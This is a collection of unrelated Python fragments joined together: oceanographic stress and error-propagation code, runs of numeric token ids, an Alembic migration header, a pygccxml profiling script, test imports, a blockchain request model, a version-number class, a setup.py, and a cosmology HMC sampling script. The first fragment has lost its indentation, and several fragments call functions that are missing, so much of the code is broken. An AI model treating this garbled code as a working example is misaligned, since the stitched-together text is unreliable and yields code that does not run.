# Get rid of annoying tiny values.
svarl = ["Puu", "Pvv", "Pbb", "Cuv", "Cub", "Cvb", "Pwwg", "Cuwg", "Cvwg"]
for var in svarl:
c4w[var][0, ...] = 0.0
c4[var + "_int"] = np.full((N_windows, 4), np.nan)
# Horizontal azimuth according to Jing 2018
c4w["theta"] = np.arctan2(2.0 * c4w["Cuv"].real, (c4w["Puu"] - c4w["Pvv"])) / 2
# Integration #############################################################
print("Integrating power spectra.")
for var in svarl:
c4w[var + "_cint"] = np.full_like(c4w[var], fill_value=np.nan)
fcor = np.abs(cc["f"]) / pi2
N_freq = len(freq)
freq_ = np.tile(freq[:, np.newaxis, np.newaxis], (1, N_windows, Nclevels))
ulim = fhi * np.tile(c4["N"][np.newaxis, ...], (N_freq, 1, 1)) / pi2
llim = fcor * flo
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Puu", "Pvv", "Pbb", "Cuv", "Pwwg"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Change lower integration limits for vertical components...
llim = fcor * flov
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Cub", "Cvb", "Cuwg", "Cvwg"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Ruddic and Joyce effective stress
for var1, var2 in zip(["Tuwg", "Tvwg"], ["Cuwg", "Cvwg"]):
func = use * c4w[var2].real * (1 - fcor ** 2 / freq_ ** 2)
nans = np.isnan(func)
func[nans] = 0.0
c4[var1 + "_int"] = igr.simps(func, freq, axis=0)
func = use * c4w[var2].real * (1 - fcor ** 2 / freq_ ** 2)
nans = np.isnan(func)
func[nans] = 0.0
c4w[var1 + "_cint"] = igr.cumtrapz(func, freq, axis=0, initial=0.0)
# Usefull quantities
c4["nstress"] = c4["Puu_int"] - c4["Pvv_int"]
c4["sstress"] = -2.0 * c4["Cuv_int"]
c4["F_horiz"] = (
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]) * c4["nstrain"]
- c4["Cuv_int"] * c4["sstrain"]
)
c4["F_vert"] = (
-(c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2) * c4["dudz"]
- (c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2) * c4["dvdz"]
)
c4["F_vert_alt"] = -c4["Tuwg_int"] * c4["dudz"] - c4["Tvwg_int"] * c4["dvdz"]
c4["F_total"] = c4["F_horiz"] + c4["F_vert"]
c4["EPu"] = c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2
c4["EPv"] = c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2
##
c4["nstress_cov"] = c4["couu"] - c4["covv"]
c4["sstress_cov"] = -2.0 * c4["couv"]
c4["F_horiz_cov"] = (
-0.5 * (c4["couu"] - c4["covv"]) * c4["nstrain"] - c4["couv"] * c4["sstrain"]
)
c4["F_vert_cov"] = (
-(c4["couw"] - cc["f"] * c4["covb"] / c4["N"] ** 2) * c4["dudz"]
- (c4["covw"] + cc["f"] * c4["coub"] / c4["N"] ** 2) * c4["dvdz"]
)
c4["F_total_cov"] = c4["F_horiz_cov"] + c4["F_vert_cov"]
# %% [markdown]
# Estimate standard error on covariances.
# %%
bootnum = 1000
np.random.seed(12341555)
idxs = np.arange(nperseg, dtype="i2")
# def cov1(xy, axis=0):
# x = xy[..., -1]
# y = xy[..., -1]
# return np.mean((x - np.mean(x, axis=axis))*(y - np.mean(y, axis=axis)), axis=axis)
print("Estimating error on covariance using bootstrap (slow).")
euu_ = np.zeros((bootnum, N_windows, Nclevels))
evv_ = np.zeros((bootnum, N_windows, Nclevels))
eww_ = np.zeros((bootnum, N_windows, Nclevels))
ebb_ = np.zeros((bootnum, N_windows, Nclevels))
euv_ = np.zeros((bootnum, N_windows, Nclevels))
euw_ = np.zeros((bootnum, N_windows, Nclevels))
evw_ = np.zeros((bootnum, N_windows, Nclevels))
eub_ = np.zeros((bootnum, N_windows, Nclevels))
evb_ = np.zeros((bootnum, N_windows, Nclevels))
for i in range(bootnum):
idxs_ = np.random.choice(idxs, nperseg)
u_ = c4w["u_hib"][idxs_, ...]
v_ = c4w["v_hib"][idxs_, ...]
w_ = c4w["w_hib"][idxs_, ...]
b_ = c4w["b_hib"][idxs_, ...]
euu_[i, ...] = cov(u_, u_, axis=0)
evv_[i, ...] = cov(v_, v_, axis=0)
eww_[i, ...] = cov(w_, w_, axis=0)
ebb_[i, ...] = cov(b_, b_, axis=0)
euv_[i, ...] = cov(u_, v_, axis=0)
euw_[i, ...] = cov(u_, w_, axis=0)
evw_[i, ...] = cov(v_, w_, axis=0)
eub_[i, ...] = cov(u_, b_, axis=0)
evb_[i, ...] = cov(v_, b_, axis=0)
c4["euu"] = euu_.std(axis=0)
c4["evv"] = evv_.std(axis=0)
c4["eww"] = eww_.std(axis=0)
c4["ebb"] = ebb_.std(axis=0)
c4["euv"] = euv_.std(axis=0)
c4["euw"] = euw_.std(axis=0)
c4["evw"] = evw_.std(axis=0)
c4["eub"] = eub_.std(axis=0)
c4["evb"] = evb_.std(axis=0)
# %% [markdown]
# Error on gradients.
# %%
finite_diff_err = 0.06 # Assume 6 percent...
SNR_dudz = np.load("../data/SNR_dudz.npy")
SNR_dvdz = np.load("../data/SNR_dvdz.npy")
SNR_nstrain = np.load("../data/SNR_nstrain.npy")
SNR_sstrain = np.load("../data/SNR_sstrain.npy")
ones = np.ones_like(c4["euu"])
c4["edudz"] = ones * np.sqrt(c4["dudz"].var(axis=0) / SNR_dudz)
c4["edvdz"] = ones * np.sqrt(c4["dvdz"].var(axis=0) / SNR_dvdz)
c4["enstrain"] = esum(
ones * np.sqrt(c4["nstrain"].var(axis=0) / SNR_nstrain),
finite_diff_err * c4["nstrain"],
)
c4["esstrain"] = esum(
ones * np.sqrt(c4["sstrain"].var(axis=0) / SNR_sstrain),
finite_diff_err * c4["sstrain"],
)
# %% [markdown]
# Error propagation.
# %%
euumvv = 0.5 * esum(c4["euu"], c4["evv"])
c4["enstress"] = euumvv.copy()
enorm = emult(
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]), c4["nstrain"], euumvv, c4["enstrain"]
)
eshear = emult(c4["Cuv_int"], c4["sstrain"], c4["euv"], c4["esstrain"])
c4["errF_horiz_norm"] = enorm.copy()
c4["errF_horiz_shear"] = eshear.copy()
c4["errF_horiz"] = esum(enorm, eshear)
euumvv = 0.5 * esum(c4["euu"], c4["evv"])
c4["enstress_cov"] = euumvv.copy()
enorm = emult(-0.5 * (c4["couu"] - c4["covv"]), c4["nstrain"], euumvv, c4["enstrain"])
eshear = emult(c4["couv"], c4["sstrain"], c4["euv"], c4["esstrain"])
c4["errF_horiz_norm_cov"] = enorm.copy()
c4["errF_horiz_shear_cov"] = eshear.copy()
c4["errF_horiz_cov"] = esum(enorm, eshear)
euwmvb = esum(c4["euw"], np.abs(cc["f"] / c4["N"] ** 2) * c4["evb"])
evwpub = esum(c4["evw"], np.abs(cc["f"] / c4["N"] ** 2) * c4["eub"])
c4["evstressu"] = euwmvb
c4["evstressv"] = evwpub
edu = emult(
-(c4["Cuwg_int"] - cc["f"] * c4["Cvb_int"] / c4["N"] ** 2),
c4["dudz"],
euwmvb,
c4["edudz"],
)
edv = emult(
-(c4["Cvwg_int"] + cc["f"] * c4["Cub_int"] / c4["N"] ** 2),
c4["dvdz"],
evwpub,
c4["edvdz"],
)
c4["errEPu"] = edu.copy()
c4["errEPv"] = edv.copy()
c4["errF_vert"] = esum(edu, edv)
c4["errEPu_alt"] = emult(-c4["Tuwg_int"], c4["dudz"], c4["euw"], c4["edudz"])
c4["errEPv_alt"] = emult(-c4["Tvwg_int"], c4["dvdz"], c4["evw"], c4["edvdz"])
c4["errF_vert_alt"] = esum(c4["errEPu_alt"], c4["errEPv_alt"])
edu = emult(
-(c4["couw"] - cc["f"] * c4["covb"] / c4["N"] ** 2), c4["dudz"], euwmvb, c4["edudz"]
)
edv = emult(
-(c4["covw"] + cc["f"] * c4["coub"] / c4["N"] ** 2), c4["dvdz"], evwpub, c4["edvdz"]
)
c4["errEPu_cov"] = edu.copy()
c4["errEPv_cov"] = edv.copy()
c4["errF_vert_cov"] = esum(edu, edv)
c4["errF_total"] = esum(c4["errF_vert"], c4["errF_horiz"])
c4["errF_total_cov"] = esum(c4["errF_vert_cov"], c4["errF_horiz_cov"])
# %% [markdown]
# Save the interpolated data.
# %% ########################## SAVE CORRECTED FILES ##########################
io.savemat(os.path.join(data_out, "C_alt.mat"), c4)
io.savemat(os.path.join(data_out, "C_altw.mat"), c4w)
# %% [markdown]
# <a id="ADCP"></a>
# %% [markdown]
# # ADCP Processing
# %% ########################## PROCESS ADCP DATA #############################
print("ADCP PROCESSING")
tf = np.array([16.0, 2.0]) # band pass filter cut off hours
tc_hrs = 40.0 # Low pass cut off (hours)
dt = 0.5 # Data sample period hr
print("Loading ADCP data from file.")
file = os.path.expanduser(os.path.join(data_in, "ladcp_data.mat"))
adcp = utils.loadmat(file)["ladcp2"]
print("Removing all NaN rows.")
varl = ["u", "v", "z"]
for var in varl: # Get rid of the all nan row.
adcp[var] = adcp.pop(var)[:-1, :]
print("Calculating vertical shear.")
z = adcp["z"]
dudz = np.diff(adcp["u"], axis=0) / np.diff(z, axis=0)
dvdz = np.diff(adcp["v"], axis=0) / np.diff(z, axis=0)
nans = np.isnan(dudz) | np.isnan(dvdz)
dudz[nans] = np.nan
dvdz[nans] = np.nan
adcp["zm"] = utils.mid(z, axis=0)
adcp["dudz"] = dudz
adcp["dvdz"] = dvdz
# Low pass filter data.
print("Low pass filtering at {:1.0f} hrs.".format(tc_hrs))
varl = ["u", "v", "dudz", "dvdz"]
for var in varl:
data = adcp[var]
nans = np.isnan(data)
adcp[var + "_m"] = np.nanmean(data, axis=0)
datalo = utils.butter_filter(
utils.interp_nans(adcp["dates"], data, axis=1), 1 / tc_hrs, 1 / dt, btype="low"
)
# Then put nans back...
if nans.any():
datalo[nans] = np.nan
namelo = var + "_lo"
adcp[namelo] = datalo
namehi = var + "_hi"
adcp[namehi] = adcp[var] - adcp[namelo]
# Band pass filter the data.
print("Band pass filtering between {:1.0f} and {:1.0f} hrs.".format(*tf))
varl = ["u", "v", "dudz", "dvdz"]
for var in varl:
data = adcp[var]
nans = np.isnan(data)
databp = utils.butter_filter(
utils.interp_nans(adcp["dates"], data, axis=1), 1 / tf, 1 / dt, btype="band"
)
# Then put nans back...
if nans.any():
databp[nans] = np.nan
namebp = var + "_bp"
adcp[namebp] = databp
io.savemat(os.path.join(data_out, "ADCP.mat"), adcp)
# %% [markdown]
# <a id="VMP"></a>
# %% [markdown]
# ## VMP data
# %%
print("VMP PROCESSING")
vmp = utils.loadmat(os.path.join(data_in, "jc054_vmp_cleaned.mat"))["d"]
box = np.array([[-58.0, -58.0, -57.7, -57.7], [-56.15, -55.9, -55.9, -56.15]]).T
p = path.Path(box)
in_box = p.contains_points(np.vstack((vmp["startlon"], vmp["startlat"])).T)
idxs = np.argwhere(in_box).squeeze()
Np = len(idxs)
print("Isolate profiles in match around mooring.")
for var in vmp:
ndim = np.ndim(vmp[var])
if ndim == 2:
vmp[var] = vmp[var][:, idxs]
if ndim == 1 and vmp[var].size == 36:
vmp[var] = vmp[var][idxs]
print("Rename variables.")
vmp["P"] = vmp.pop("press")
vmp["T"] = vmp.pop("temp")
vmp["S"] = vmp.pop("salin")
print("Deal with profiles where P[0] != 1.")
P_ = np.arange(1.0, 10000.0)
i0o = np.zeros((Np), dtype=int)
i1o = np.zeros((Np), dtype=int)
i0n = np.zeros((Np), dtype=int)
i1n = np.zeros((Np), dtype=int)
pmax = 0.0
for i in range(Np):
nans = np.isnan(vmp["eps"][:, i])
i0o[i] = i0 = np.where(~nans)[0][0]
i1o[i] = i1 = np.where(~nans)[0][-1]
P0 = vmp["P"][i0, i]
P1 = vmp["P"][i1, i]
i0n[i] = np.searchsorted(P_, P0)
i1n[i] = np.searchsorted(P_, P1)
pmax = max(P1, pmax)
P = np.tile(np.arange(1.0, pmax + 2)[:, np.newaxis], (1, len(idxs)))
eps = np.full_like(P, np.nan)
chi = np.full_like(P, np.nan)
T = np.full_like(P, np.nan)
S = np.full_like(P, np.nan)
for i in range(Np):
eps[i0n[i] : i1n[i] + 1, i] = vmp["eps"][i0o[i] : i1o[i] + 1, i]
chi[i0n[i] : i1n[i] + 1, i] = vmp["chi"][i0o[i] : i1o[i] + 1, i]
T[i0n[i] : i1n[i] + 1, i] = vmp["T"][i0o[i] : i1o[i] + 1, i]
S[i0n[i] : i1n[i] + 1, i] = vmp["S"][i0o[i] : i1o[i] + 1, i]
vmp["P"] = P
vmp["eps"] = eps
vmp["chi"] = chi
vmp["T"] = T
vmp["S"] = S
vmp["z"] = gsw.z_from_p(vmp["P"], vmp["startlat"])
print("Calculate neutral density.")
# Compute potential temperature using the 1983 UNESCO EOS.
vmp["PT0"] = seawater.ptmp(vmp["S"], vmp["T"], vmp["P"])
# Flatten variables for analysis.
lons = np.ones_like(P) * vmp["startlon"]
lats = np.ones_like(P) * vmp["startlat"]
S_ = vmp["S"].flatten()
T_ = vmp["PT0"].flatten()
P_ = vmp["P"].flatten()
LO_ = lons.flatten()
LA_ = lats.flatten()
gamman = gamma_GP_from_SP_pt(S_, T_, P_, LO_, LA_)
vmp["gamman"] = np.reshape(gamman, vmp["P"].shape) + 1000.0
io.savemat(os.path.join(data_out, "VMP.mat"), vmp)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
43313,
685,
4102,
2902,
60,
198,
2,
1303,
10854,
262,
8246,
285,
2675,
278,
1366,
198,
2,
198,
2,
26714,
25,... | 2.015024 | 23,563 |
"""add verification_roles table
Revision ID: 4fc3ae9ba717
Revises: 215e9036a3d7
Create Date: 2020-07-05 20:08:18.197783
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4fc3ae9ba717'
down_revision = '215e9036a3d7'
branch_labels = None
depends_on = None
| [
37811,
2860,
19637,
62,
305,
829,
3084,
198,
198,
18009,
1166,
4522,
25,
604,
16072,
18,
3609,
24,
7012,
22,
1558,
198,
18009,
2696,
25,
22951,
68,
3829,
2623,
64,
18,
67,
22,
198,
16447,
7536,
25,
12131,
12,
2998,
12,
2713,
1160,
... | 2.492063 | 126 |
# Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import os
import sys
import time
import hotshot
import hotshot.stats
this_module_dir_path = os.path.abspath(
os.path.dirname(sys.modules[__name__].__file__))
sys.path.insert(1, os.path.join(this_module_dir_path, '../../'))
sys.path.insert(2, os.path.join(this_module_dir_path, '../'))
import autoconfig # nopep8
from pygccxml import parser # nopep8
from pygccxml import declarations # nopep8
dcache_file_name = os.path.join(autoconfig.data_directory, 'pygccxml.cache')
if os.path.exists(dcache_file_name):
os.remove(dcache_file_name)
#########################################################################
# testing include_std.hpp
#########################################################################
# testing include_std.hpp
if __name__ == "__main__":
# test_on_windows_dot_h()
# test_source_on_include_std_dot_hpp()
# test_project_on_include_std_dot_hpp()
print('running')
prof = hotshot.Profile('parser.prof')
prof.runcall(lambda: test_on_big_file('itkImage.xml', 1))
stats = hotshot.stats.load("parser.prof")
stats.sort_stats('time', 'calls')
stats.print_stats(30)
print('running - done')
# print 'loading file'
# pdata = pstats.Stats('pygccxml.profile')
# print 'loading file - done'
# print 'striping dirs'
# pdata.strip_dirs()
# print 'striping dirs - done'
# print 'sorting stats'
# pdata.sort_stats('time').print_stats(476)
# print 'sorting stats - done'
# pdata.print_callers('find_all_declarations')
| [
2,
15069,
1946,
12,
5539,
39917,
10442,
42727,
13,
198,
2,
15069,
5472,
12,
10531,
7993,
30254,
16206,
7204,
13,
198,
2,
4307,
6169,
739,
262,
19835,
10442,
13789,
11,
10628,
352,
13,
15,
13,
198,
2,
4091,
2638,
1378,
2503,
13,
3952... | 2.752 | 625 |
import pytest
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from sklearn.linear_model import LinearRegression, LogisticRegression
from ml_tooling import Model
from ml_tooling.data import load_demo_dataset
from ml_tooling.plots.viz import RegressionVisualize, ClassificationVisualize
from ml_tooling.result import Result
| [
11748,
12972,
9288,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
198,
6738,
2603,
29487,
8019,
13,
897,
274,
1330,
12176,
274,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
44800,
8081,
2234,
11,
5972,
2569,
808... | 3.46 | 100 |
from typing import Optional
from pydantic import Field, conint
from pystratis.api import Model
from pystratis.core.types import uint256
# noinspection PyUnresolvedReferences
class GetTxOutRequest(Model):
"""A request model for the node/gettxout endpoint.
Args:
trxid (uint256): The trxid to check.
vout (conint(ge=0)): The vout.
include_mempool (bool, optional): Include mempool in check. Default=True.
"""
trxid: uint256
vout: conint(ge=0) = Field(default=0)
include_mempool: Optional[bool] = Field(default=True, alias='includeMemPool')
| [
6738,
19720,
1330,
32233,
198,
6738,
279,
5173,
5109,
1330,
7663,
11,
369,
600,
198,
6738,
12972,
2536,
37749,
13,
15042,
1330,
9104,
198,
6738,
12972,
2536,
37749,
13,
7295,
13,
19199,
1330,
20398,
11645,
628,
198,
2,
645,
1040,
14978,... | 2.747664 | 214 |
import sys
from pyteal import *
if __name__ == "__main__":
arg = int(sys.argv[1])
print(compileTeal(contract_account(arg), Mode.Signature, version=3))
| [
11748,
25064,
198,
6738,
12972,
660,
282,
1330,
1635,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1822,
796,
493,
7,
17597,
13,
853,
85,
58,
16,
12962,
198,
220,
220,
220,
3601,
7,
5... | 2.53125 | 64 |
from typing import List, Pattern
import re
from matflow.exceptionpackage.MatFlowException import InternalException
class VersionNumber:
"""
This class represents string expressions that are valid version numbers
"""
__number: str
def __init__(self, number: str):
"""Translates correct string expressions into VersionNumber objects
Only works if the expression is correct. Otherwise, throws error.
Args:
number (str): The version number
"""
p: Pattern[str] = re.compile("1(\.[1-9][0-9]*)*")
if not p.fullmatch(number):
raise InternalException(
"Internal Error: " + number + " isn't a valid version number."
)
self.__number = number
# getter
def get_number(self) -> str:
"""Gets the version number stored in this object.
Returns:
str: Version number
"""
return self.__number
# setter
def set_number(self, number: str):
"""Sets the number attribute of the object.
Args:
number (str): The new number that has to be a correct version number
"""
self.__number = number
# methods
def get_dir_name(self) -> str:
"""Simply returns number but every occurrence of '.' is replaced with '_'. To make the number a valid dir name.
Returns:
str: The dir name for the version
"""
return self.__number.replace(".", "_")
def get_predecessor(self):
"""
Just cuts of the postfix ".<int>" from the number of self and puts that str into a new VersionNumber object.
Raises exception if the current version is version 1.
Returns:
VersionNumber: The predecessor version number
"""
if self.get_number() == "1":
raise InternalException("Internal Error: Version '1' has no predecessor.")
# otherwise, the version number has a predecessor
version_number_components: List[str] = self.get_number().split(".")
version_number_components.pop(
len(version_number_components) - 1
) # remove last component of the version number
point_seperator: str = "."
predecessor_str: str = point_seperator.join(
version_number_components
) # reconnect the components
return VersionNumber(predecessor_str)
def get_successor(self, existing_version_numbers: List[str]):
"""
Builds the smallest subsequent version number that doesn't exist yet.
Args:
existing_version_numbers (List[str]): List of all existing version numbers.
Returns:
VersionNumber: The new subsequent version number
"""
successor_postfix: int = 1
while True:
possible_successor: str = self.get_number() + "." + str(successor_postfix)
if not existing_version_numbers.__contains__(possible_successor):
return VersionNumber(possible_successor)
successor_postfix += 1 # otherwise, we try the next option
| [
6738,
19720,
1330,
7343,
11,
23939,
198,
11748,
302,
198,
6738,
2603,
11125,
13,
1069,
4516,
26495,
13,
19044,
37535,
16922,
1330,
18628,
16922,
628,
198,
4871,
10628,
15057,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
770,
1398,... | 2.556465 | 1,222 |
import itertools
import copy
import logging
import datapackage
from dataflows.helpers.resource_matcher import ResourceMatcher
from datapackage_pipelines.wrapper import ingest, spew, get_dependency_datapackage_url
from datapackage_pipelines.utilities.resources import tabular, PROP_STREAMING, \
PROP_STREAMED_FROM
if __name__ == '__main__':
ResourceLoader()()
| [
11748,
340,
861,
10141,
198,
11748,
4866,
198,
11748,
18931,
198,
198,
11748,
4818,
499,
441,
496,
198,
198,
6738,
1366,
44041,
13,
16794,
364,
13,
31092,
62,
6759,
2044,
1330,
20857,
19044,
2044,
198,
198,
6738,
4818,
499,
441,
496,
... | 2.992 | 125 |
from pathlib import Path
from setuptools import setup, find_packages
from alab_management import __version__
setup(
name="alab_management",
packages=find_packages(exclude=["tests", "tests.*"]),
package_data={"alab_management": ["py.typed"]},
version=__version__,
author="Alab Project Team",
python_requires=">=3.6",
description="Workflow management system for alab",
zip_safe=False,
install_requires=[
package.strip("\n")
for package in (Path(__file__).parent / "requirements.txt").open("r", encoding="utf-8").readlines()],
include_package_data=True,
entry_points={
"console_scripts": [
"alabos = alab_management.scripts.cli:cli",
]
}
)
| [
6738,
3108,
8019,
1330,
10644,
198,
198,
6738,
900,
37623,
10141,
1330,
9058,
11,
1064,
62,
43789,
198,
198,
6738,
435,
397,
62,
27604,
1330,
11593,
9641,
834,
198,
198,
40406,
7,
198,
220,
220,
220,
1438,
2625,
282,
397,
62,
27604,
... | 2.559441 | 286 |
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import tensorflow as tf
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
session = tf.compat.v1.Session(config=config)
import tensorflow_probability as tfp
tfd = tfp.distributions
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
import sys, os, time, argparse
import flowpm
import sys, os, time
sys.path.append('../../galference/utils/')
sys.path.append('../src/')
sys.path.append('/mnt/home/cmodi/Research/Projects/flowpm-pgd')
import tools
import diagnostics as dg
from pmfuncs import Evolve
from pyhmc import PyHMC_fourier, DualAveragingStepSize
from callback import callback_sampling, datafig
import recon
##########
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--eps', type=float, help='step size')
parser.add_argument('--nc', type=int, help='mesh size')
parser.add_argument('--bs', type=float, help='box size')
parser.add_argument('--jobid', type=int, help='an integer for the accumulator')
parser.add_argument('--suffix', type=str, default="", help='suffix to fpath')
parser.add_argument('--nR', type=int, default=0, help="number of smoothings")
parser.add_argument('--scaleprior', type=int, default=1, help="add power to scale to prior")
parser.add_argument('--optinit', type=int, default=1, help="initialize near MAP")
parser.add_argument('--nsamples', type=int, default=5000, help="number of HMC samples")
parser.add_argument('--truecosmo', type=int, default=1, help="use same cosmology for prior and data")
parser.add_argument('--debug', type=int, default=0, help="debug run")
parser.add_argument('--dnoise', type=float, default=1., help='noise level, 1 is shot noise')
parser.add_argument('--Rmin', type=float, default=0., help='Rmin')
parser.add_argument('--kwts', type=int, default=0, help='use kwts')
parser.add_argument('--pamp', type=float, default=1., help='amplitude of initial power')
args = parser.parse_args()
device = args.jobid
##########
nchains = 1
reconiter = 100
#burnin = 200
#mcmciter = 500
#ntrain = 10
tadapt = 100
thinning = 20
lpsteps1, lpsteps2 = 25, 50
allRs = [args.Rmin, 1., 2., 4.]
allR = allRs[:args.nR + 1][::-1]
if args.debug == 1:
nchains = 1
reconiter = 10
burnin = 10
mcmciter = 10
tadapt = 10
thinning = 2
lpsteps1, lpsteps2 = 3, 5
suffix = args.suffix
bs, nc = args.bs, args.nc
nsteps = 3
a0, af, nsteps = 0.1, 1.0, nsteps
stages = np.linspace(a0, af, nsteps, endpoint=True)
donbody = False
order = 1
shotnoise = bs**3/nc**3
dnoise = 1 #shotnoise/nc**1.5
if order == 2: fpath = '/mnt/ceph/users/cmodi/galference/dm_hmc/L%04d_N%04d_LPT'%(bs, nc)
elif order == 1: fpath = '/mnt/ceph/users/cmodi/galference/dm_hmc/L%04d_N%04d_ZA'%(bs, nc)
if suffix == "": fpath = fpath + '/'
else: fpath = fpath + "-" + suffix + '/'
os.makedirs('%s'%fpath, exist_ok=True)
os.makedirs('%s'%fpath + '/figs/', exist_ok=True)
# Compute necessary Fourier kernels
evolve = Evolve(nc, bs, a0=a0, af=af, nsteps = nsteps, donbody=donbody, order=order)
np.random.seed(100)
zic = np.random.normal(0, 1, nc**3).reshape(1, nc, nc, nc)
noise = np.random.normal(0, dnoise, nc**3).reshape(1, nc, nc, nc)
ic = evolve.z_to_lin(zic).numpy()
fin = evolve.pm(tf.constant(ic)).numpy()
data = fin + noise
data = data.astype(np.float32)
tfdata = tf.constant(data)
tfnoise = tf.constant(dnoise)
np.save(fpath + 'ic', ic)
np.save(fpath + 'fin', fin)
np.save(fpath + 'data', data)
fig = datafig(ic, fin, data, bs, dnoise)
plt.savefig(fpath + 'data')
plt.close()
k, pic = tools.power(ic[0], boxsize=bs)
k, pf = tools.power(fin[0], boxsize=bs)
k, pd = tools.power(data[0], boxsize=bs)
k, pn = tools.power(1+noise[0], boxsize=bs)
knoise = evolve.kmesh[evolve.kmesh > k[(pn > pf)][0]].min()
print("Noise dominated after : ", knoise, (evolve.kmesh > knoise).sum()/nc**3)
###################################################################################
##############################################
@tf.function
@tf.function
###################################################################################
###################################################################################
###########Search for good initialization
start = time.time()
seed = 100*device+rank + 2021
np.random.seed(seed)
x0 = np.random.normal(size=nchains*nc**3).reshape(nchains, nc, nc, nc).astype(np.float32) * args.pamp
if args.optinit == 1:
for iR, RR in enumerate(allR):
x0 = recon.map_estimate(evolve, x0, data, RR, maxiter=reconiter)
fig = callback_sampling([evolve.z_to_lin(x0)], ic, bs)
plt.savefig(fpath + '/figs/map%02d-%02d'%(device, RR*10))
plt.close()
print("time taken for Scipy LBFGS : ", time.time() - start)
#Add white noise
if (args.optinit == 1) & (args.scaleprior==1):
print('\nScaling to prior')
if abs(x0.mean()) <1e-1: k, pz = tools.power(x0[0]+1., boxsize = bs)
else: k, pz = tools.power(x0[0], boxsize = bs)
k = k[1:]
pz = pz[1:]
pdiff = (bs/nc)**3 - pz
print(pz, pdiff)
np.save(fpath + 'pdiff%02d'%device, pdiff)
xx, yy = k[pdiff > 0], pdiff[pdiff > 0]
ipkdiff = lambda x: 10**np.interp(np.log10(x), np.log10(xx), np.log10(yy))
x0 = x0 + flowpm.linear_field(nc, bs, ipkdiff, seed=seed).numpy()
else:
pass
#Generate q
q = x0.copy()
#$#if args.kwts == 1:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**2
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts /= kwts[0, 0, 0]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$#if args.kwts == 2:
#$# #ikwts
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**2
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts /= kwts[0, 0, 0]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts = 1/kwts
#$#if args.kwts == 3:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$#if args.kwts == 4:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts /= knoise**3
#$#if args.kwts == 5:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts /= knoise**3
#$# kwts = 1/kwts
#$#if args.kwts == 6:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
if args.kwts == 7:
kwts = 0.5 * (evolve.kmesh/knoise)**3
kwts[0, 0, 0] = kwts[0, 0, 1]
mask = evolve.kmesh > knoise
kwts[mask] = 0.5
threshold=1e-3
mask2 = kwts < threshold
print(mask2.sum(), mask2.sum()/nc**3)
kwts[mask2] = threshold
else:
kwts = None
################################################################################
################################################################################
####Sampling
print("\nstartng HMC in \n", device, rank, size)
start = time.time()
py_log_prob = lambda x: unnormalized_log_prob(tf.constant(x, dtype=tf.float32), tf.constant(1.)).numpy().astype(np.float32)
py_grad_log_prob = lambda x: grad_log_prob(tf.constant(x, dtype=tf.float32), tf.constant(1.)).numpy().astype(np.float32)
